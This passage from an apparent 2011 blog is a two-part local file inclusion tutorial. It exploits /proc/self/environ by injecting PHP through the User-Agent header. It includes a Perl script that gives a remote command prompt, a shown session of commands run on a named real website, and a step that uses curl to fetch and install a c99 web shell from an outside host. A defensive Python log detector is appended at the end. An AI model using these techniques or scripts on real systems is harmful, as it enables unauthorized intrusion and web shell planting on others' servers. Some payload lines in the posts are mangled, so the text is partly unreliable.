Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request for a PHP page is made, Apache forks (creating a new process) and execs the PHP binary to actually run/interpret the PHP script. As on every *nix system, each running process has its own /proc entry, which can be quite useful to us, since it holds a lot of information about the process and the environment it is running in.

More specifically, the file /proc/self/environ of a running PHP process contains something like this (the entries are NUL-separated; the NUL bytes show up as � below):
Code:
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin�
SERVER_ADMIN=webmaster@this.domain�
(...)
(X11; U; Linux i686; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 Gentoo�HTTP_KEEP_ALIVE=300�
(...)
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
Code:
http://somesite.com/index.php?file=../../../../../proc/self/environ
You guessed right: it works. The PHP system() call is actually executed.

So, after coding this little Perl script:
Code:
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];            # base URL ending in the vulnerable parameter (see the session below)
my ($line,$response);
# climb far enough up the tree to reach /proc/self/environ from any document root
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while( $line = <STDIN> ) {     # one command per line from the terminal
    chop($line);
    $browser->agent("jcfs /dev/stdout");?>jcfs");   # the PHP tag in this user-agent string was mangled when the page was scraped; left as posted
    $response = $browser->get( $url );
    if ($response->content =~ /jcfs(.*)jcfs/s) {    # command output is delimited by the jcfs markers
        print $1;
    }
    print "jcfsprompt: ";
}
I tried something like this...

Code:
jcfs@heaven ~/boxes $ perl lfi.pl http://www.fastfrags.co.uk/index.php?page=
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
2.6.15-1.2054_FC5
jcfsprompt: pwd
/home/fastfr00/public_html
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin
(...)

Thursday, September 8, 2011

Local File Inclusion Tutorial Part 2 of 4

Required:
1. A site vulnerable to LFI
2. PHP knowledge
3. The Mozilla Firefox browser...
================================

So... first you find some site vulnerable to LFI... now we must check if there are logs...
They are usually stored in /proc/self/environ... so just replace /etc/passwd with /proc/self/environ

If you get something like "DOCUMENT_ROOT=..." then it means you successfully found logs :D

Now, on that page you can find something like "HTTP_USER_AGENT"...
This value is usually our user agent (Mozilla, Netscape, etc.) and now we must spoof it... but how?

Open a new tab in Mozilla, and type "about:config" (without quotes)...

Now, in "Filter" type: general.useragent.extra.firefox

You will get something like this:

Code:
Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7
Now, double click on general.useragent.extra.firefox and replace "Firefox/3.0.7"
with

Code:
If everything is good you will get the shell included... Otherwise, you will get errors... Mostly I was getting the error "URL-File access disabled" or something like that... but using PHP I found another way...

Instead of typing
Code:
as the user agent, type this:
Code:
Then load your vuln page like this:
Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ?cmd=curl http://shelladress.com/c99.txt -o c99.php
So, let's review... basically, you are just adding the &cmd= thing at the end of the URL...

Now, using the "curl" command you fetch the content of the shell in txt format, and with -o c99.php you write it out as c99.php...

Now simply go to your site like this:
Code:
http://yourvulnsite.com/c99.php
And that's all for now...cheers!
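From the defender's side, the /proc/self/environ trick used in both the Part 3 script and the Part 2 walkthrough leaves a clear footprint in the web server's access log: traversal sequences aimed at environ or log files, and PHP open tags in the User-Agent or Referer header. The following Python detector is an added example, not part of the original posts; the log lines are constructed and the indicator names are my own.

```python
import re
from urllib.parse import unquote

# "combined" log format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Files an LFI attempt typically reaches for (the /proc/self/environ trick above, /etc/passwd, web logs)
SENSITIVE_TARGETS = ("/proc/self/environ", "/etc/passwd", "access_log", "error_log", "access.log", "error.log")
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")
PHP_TAG_RE = re.compile(r"<\?(php|=)", re.IGNORECASE)

def normalize(s):
    """URL-decode twice so double-encoded traversal (%252e%252e%252f) is caught too."""
    return unquote(unquote(s))

def classify(line):
    """Return the list of indicator names for one log line (empty if nothing suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    path, ua, ref = normalize(m["path"]), normalize(m["ua"]), normalize(m["referer"])
    hits = []
    if TRAVERSAL_RE.search(path):
        hits.append("traversal")
    if any(t in path for t in SENSITIVE_TARGETS):
        hits.append("sensitive-file")
    if PHP_TAG_RE.search(ua) or PHP_TAG_RE.search(ref):
        hits.append("php-tag-in-header")   # PHP code smuggled via a header that ends up in environ/logs
    return hits

def scan(log_text):
    """Map 1-based line numbers of suspicious lines to their indicators."""
    findings = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings[n] = hits
    return findings

# Constructed sample log: one benign request, one environ-inclusion attempt with a PHP tag in the
# user agent, and one double-URL-encoded traversal to /etc/passwd.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Sep/2011:10:00:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux)"
198.51.100.9 - - [29/Sep/2011:10:00:02 +0000] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 2048 "-" "Mozilla/5.0 <?php echo 'x'; ?>"
198.51.100.9 - - [29/Sep/2011:10:00:03 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 512 "-" "curl/7.21"
"""
```

Running scan(SAMPLE_LOG) flags lines 2 and 3 only; the same checks belong in a WAF rule or a log-monitoring alert, and the root fix is an allowlist of includable page names instead of passing the parameter to include().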